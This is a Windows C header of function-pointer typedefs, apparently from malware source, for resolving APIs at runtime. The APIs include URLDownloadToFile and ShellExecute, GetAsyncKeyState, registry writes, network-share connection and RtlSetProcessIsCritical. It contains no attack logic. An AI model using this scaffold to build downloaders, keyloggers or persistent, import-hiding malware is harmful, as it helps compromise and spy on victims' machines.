#ifndef _CALLS
#define _CALLS
#include <Windows.h>
typedef HRESULT (WINAPI *_URLDownloadToFile)(
    DWORD pCaller,
    const TCHAR* szURL,
    const TCHAR* szFileName,
    DWORD dwReserved,
    LPBINDSTATUSCALLBACK lpfnCB
);


typedef HINSTANCE (WINAPI *_ShellExecute)(
  __in_opt  HWND hwnd,
  __in_opt  LPCTSTR lpOperation,
  __in      LPCTSTR lpFile,
  __in_opt  LPCTSTR lpParameters,
  __in_opt  LPCTSTR lpDirectory,
  __in      INT nShowCmd
);

typedef HANDLE (WINAPI *_CreateFile)(
  __in      LPCTSTR lpFileName,
  __in      DWORD dwDesiredAccess,
  __in      DWORD dwShareMode,
  __in_opt  LPSECURITY_ATTRIBUTES lpSecurityAttributes,
  __in      DWORD dwCreationDisposition,
  __in      DWORD dwFlagsAndAttributes,
  __in_opt  HANDLE hTemplateFile
);


typedef SHORT (WINAPI *_GetAsyncKeyState)(
  __in  int vKey
);

typedef int (WINAPI *_MessageBox)(
  __in_opt  HWND hWnd,
  __in_opt  LPCTSTR lpText,
  __in_opt  LPCTSTR lpCaption,
  __in      UINT uType
);

typedef BOOL (WINAPI *_EnumProcesses)(
  __out  DWORD *pProcessIds,
  __in   DWORD cb,
  __out  DWORD *pBytesReturned
);

typedef BOOL (WINAPI *_EnumProcessModules)(
  __in   HANDLE hProcess,
  __out  HMODULE *lphModule,
  __in   DWORD cb,
  __out  LPDWORD lpcbNeeded
);

typedef DWORD (WINAPI *_GetModuleBaseName)(
  __in      HANDLE hProcess,
  __in_opt  HMODULE hModule,
  __out     LPTSTR lpBaseName,
  __in      DWORD nSize
);

typedef BOOL (WINAPI *_IsWow64Process)(
  __in   HANDLE hProcess,
  __out  PBOOL Wow64Process
);


typedef HANDLE (WINAPI *_CreateMutex)(
  __in_opt  LPSECURITY_ATTRIBUTES lpMutexAttributes,
  __in      BOOL bInitialOwner,
  __in_opt  LPCTSTR lpName
);

typedef HANDLE (WINAPI *_OpenMutex)(
  __in  DWORD dwDesiredAccess,
  __in  BOOL bInheritHandle,
  __in  LPCTSTR lpName
);

typedef BOOL (WINAPI *_ReleaseMutex)(
  __in  HANDLE hMutex
);

typedef DWORD (WINAPI *_GetLastError)(void);

typedef HINSTANCE (WINAPI *_ShellExecute)(
  __in_opt  HWND hwnd,
  __in_opt  LPCTSTR lpOperation,
  __in      LPCTSTR lpFile,
  __in_opt  LPCTSTR lpParameters,
  __in_opt  LPCTSTR lpDirectory,
  __in      INT nShowCmd
);




typedef VOID (WINAPI *_Sleep)(
  __in  DWORD dwMilliseconds
);


typedef BOOL (WINAPI *_CloseHandle)(
  __in  HANDLE hObject
);

typedef BOOL (WINAPI *_DeleteFile)(
  __in  LPCTSTR lpFileName
);


typedef HMODULE (WINAPI *_LoadLibrary)(
  __in  LPCTSTR lpFileName
);

typedef FARPROC (WINAPI *_GetProcAddress)(
  __in  HMODULE hModule,
  __in  LPCSTR lpProcName
);

typedef HANDLE (WINAPI *_OpenEvent)(
  __in  DWORD dwDesiredAccess,
  __in  BOOL bInheritHandle,
  __in  LPCTSTR lpName
);

typedef DWORD (WINAPI *_WaitForSingleObject)(
  __in  HANDLE hHandle,
  __in  DWORD dwMilliseconds
);

typedef BOOL (WINAPI *_GetPerformanceInfo)(
  __out  PPERFORMANCE_INFORMATION pPerformanceInformation,
  __in   DWORD cb
);

/*
typedef MCIERROR (WINAPI *_mciSendString)(
  LPCTSTR lpszCommand,
  LPTSTR lpszReturnString,
  UINT cchReturn,
  HANDLE hwndCallback
);*/


typedef DWORD (WINAPI *_WNetAddConnection2)(
  __in  LPNETRESOURCE lpNetResource,
  __in  LPCTSTR lpPassword,
  __in  LPCTSTR lpUsername,
  __in  DWORD dwFlags
);

typedef DWORD (WINAPI *_WNetCancelConnection)(
  __in  LPCTSTR lpName,
  __in  BOOL fForce
);



typedef LONG (WINAPI *_RegCreateKeyEx)(
  __in        HKEY hKey,
  __in        LPCTSTR lpSubKey,
  __reserved  DWORD Reserved,
  __in_opt    LPTSTR lpClass,
  __in        DWORD dwOptions,
  __in        REGSAM samDesired,
  __in_opt    LPSECURITY_ATTRIBUTES lpSecurityAttributes,
  __out       PHKEY phkResult,
  __out_opt   LPDWORD lpdwDisposition
);

typedef LONG (WINAPI *_RegSetValueEx)(
  __in        HKEY hKey,
  __in_opt    LPCTSTR lpValueName,
  __reserved  DWORD Reserved,
  __in        DWORD dwType,
  __in        const BYTE *lpData,
  __in        DWORD cbData
);


typedef LONG (WINAPI *_RegCloseKey)(
  __in  HKEY hKey
);



typedef BOOL (WINAPI *_WinHttpGetIEProxyConfigForCurrentUser)(
  __inout  VOID *pProxyConfig
);

typedef MCIERROR (WINAPI *_mciSendString)(
  LPCTSTR lpszCommand,
  LPTSTR lpszReturnString,
  UINT cchReturn,
  HANDLE hwndCallback
);

typedef DWORD (WINAPI *_GetModuleFileNameEx)(
  __in      HANDLE hProcess,
  __in_opt  HMODULE hModule,
  __out     LPTSTR lpFilename,
  __in      DWORD nSize
);

typedef NTSTATUS (WINAPI *_RtlSetProcessIsCritical) (
    BOOLEAN bNew,    	// new setting for process
    BOOLEAN *pbOld,    	// pointer which receives old setting (can be null)
    BOOLEAN bNeedScb	// need system critical breaks
	);    
#endif




